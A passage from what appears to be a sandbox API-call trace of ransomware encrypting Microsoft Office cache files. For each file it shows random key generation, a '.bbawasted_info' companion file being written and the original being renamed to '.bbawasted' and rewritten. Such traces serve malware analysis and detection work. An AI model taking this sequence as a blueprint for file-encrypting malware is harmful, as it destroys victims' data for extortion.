CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.229] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.230] WriteFile (in: hFile=0x114, lpBuffer=0x5bdf00*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bdf00*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.231] SetEndOfFile (hFile=0x114) returned 1 [0067.231] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.231] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.231] lstrcpyW (in: lpString1=0x5bab5a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.231] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.bbawasted")) returned 1 [0067.232] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0067.232] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0067.232] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0xc72 [0067.232] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc72) returned 0x570000 [0067.232] CloseHandle (hObject=0x118) returned 1 [0067.235] UnmapViewOfFile (lpBaseAddress=0x570000) returned 1 [0067.235] CloseHandle (hObject=0x110) returned 1 [0067.235] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5bdf00 [0067.235] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.236] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bdf48 | out: pbBuffer=0x5bdf48) returned 1 [0067.236] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.236] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.236] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.236] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.245] SetEndOfFile (hFile=0x114) returned 1 [0067.248] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be518 | out: hHeap=0x580000) returned 1 [0067.248] CloseHandle (hObject=0x114) returned 1 [0067.249] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.249] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9660 | out: hHeap=0x580000) returned 1 [0067.249] ResetEvent (hEvent=0xec) returned 1 [0067.249] _aulldvrm () returned 0x0 [0067.249] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.250] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.250] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.250] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0067.250] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5baab8 [0067.250] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.250] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bdf00 [0067.250] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.251] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bdf00 | out: pbBuffer=0x5bdf00) returned 1 [0067.251] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.251] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.251] WriteFile (in: hFile=0x114, lpBuffer=0x5bdf00*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bdf00*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.252] SetEndOfFile (hFile=0x114) returned 1 [0067.253] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.253] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.253] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0067.254] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0067.254] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.254] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x106f [0067.254] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x106f) returned 0x570000 [0067.254] CloseHandle (hObject=0x110) returned 1 [0067.257] UnmapViewOfFile (lpBaseAddress=0x570000) returned 1 [0067.257] CloseHandle (hObject=0x118) returned 1 [0067.257] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5bef08 [0067.257] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.258] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bef50 | out: pbBuffer=0x5bef50) returned 1 [0067.258] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.258] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.259] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.259] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.268] SetEndOfFile (hFile=0x114) returned 1 [0067.272] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf520 | out: hHeap=0x580000) returned 1 [0067.272] CloseHandle (hObject=0x114) returned 1 [0067.274] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.274] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9760 | out: hHeap=0x580000) returned 1 [0067.274] _aulldvrm () returned 0x0 [0067.274] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.275] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.275] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.275] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0067.275] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5baab8 [0067.275] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.275] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bdf00 [0067.275] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.276] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bdf00 | out: pbBuffer=0x5bdf00) returned 1 [0067.276] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.276] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.278] WriteFile (in: hFile=0x114, lpBuffer=0x5bdf00*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bdf00*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.279] SetEndOfFile (hFile=0x114) returned 1 [0067.279] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.279] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.279] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.279] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0067.308] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0067.308] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.308] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x978 [0067.308] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x978) returned 0x570000 [0067.308] CloseHandle (hObject=0x11c) returned 1 [0067.311] UnmapViewOfFile (lpBaseAddress=0x570000) returned 1 [0067.312] CloseHandle (hObject=0x118) returned 1 [0067.312] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5bf788 [0067.312] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.313] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf7d0 | out: pbBuffer=0x5bf7d0) returned 1 [0067.313] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.313] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.314] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.314] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.324] SetEndOfFile (hFile=0x114) returned 1 [0067.326] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.326] CloseHandle (hObject=0x114) returned 1 [0067.327] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.327] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9660 | out: hHeap=0x580000) returned 1 [0067.327] _aulldvrm () returned 0x0 [0067.327] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.328] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.328] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.328] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0067.328] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a6) returned 0x5baab8 [0067.328] lstrcpyW (in: lpString1=0x5bab54, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.328] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf788 [0067.328] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.329] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf788 | out: pbBuffer=0x5bf788) returned 1 [0067.329] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.329] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.330] WriteFile (in: hFile=0x114, lpBuffer=0x5bf788*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf788*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.331] SetEndOfFile (hFile=0x114) returned 1 [0067.331] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.331] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.331] lstrcpyW (in: lpString1=0x5bab54, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.bbawasted")) returned 1 [0067.332] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0067.332] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0067.333] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x708 [0067.333] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x708) returned 0x570000 [0067.333] CloseHandle (hObject=0x118) returned 1 [0067.336] UnmapViewOfFile (lpBaseAddress=0x570000) returned 1 [0067.336] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.337] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf7d0 | out: pbBuffer=0x5bf7d0) returned 1 [0067.337] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.337] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.338] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.338] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.346] SetEndOfFile (hFile=0x114) returned 1 [0067.348] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.348] CloseHandle (hObject=0x114) returned 1 [0067.350] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.350] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bad68 | out: hHeap=0x580000) returned 1 [0067.350] _aulldvrm () returned 0x0 [0067.350] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.351] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.351] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.351] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0067.351] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b4) returned 0x5baab8 [0067.351] lstrcpyW (in: lpString1=0x5bab62, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.351] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf788 [0067.351] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.351] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf788 | out: pbBuffer=0x5bf788) returned 1 [0067.351] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.351] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.352] WriteFile (in: hFile=0x114, lpBuffer=0x5bf788*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf788*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.353] SetEndOfFile (hFile=0x114) returned 1 [0067.353] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.353] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.353] lstrcpyW (in: lpString1=0x5bab62, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.353] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.bbawasted")) returned 1 [0067.355] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0067.355] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.356] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x543 [0067.356] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x543) returned 0x570000 [0067.356] CloseHandle (hObject=0x11c) returned 1 [0067.359] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.360] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf7d0 | out: pbBuffer=0x5bf7d0) returned 1 [0067.360] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.360] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.361] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.361] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.369] SetEndOfFile (hFile=0x114) returned 1 [0067.371] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.371] CloseHandle (hObject=0x114) returned 1 [0067.372] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.373] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0220 | out: hHeap=0x580000) returned 1 [0067.373] _aulldvrm () returned 0x0 [0067.373] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.373] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.373] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.373] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0067.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b4) returned 0x5baab8 [0067.374] lstrcpyW (in: lpString1=0x5bab62, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.374] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf788 [0067.374] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.374] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf788 | out: pbBuffer=0x5bf788) returned 1 [0067.374] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.374] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.375] WriteFile (in: hFile=0x114, 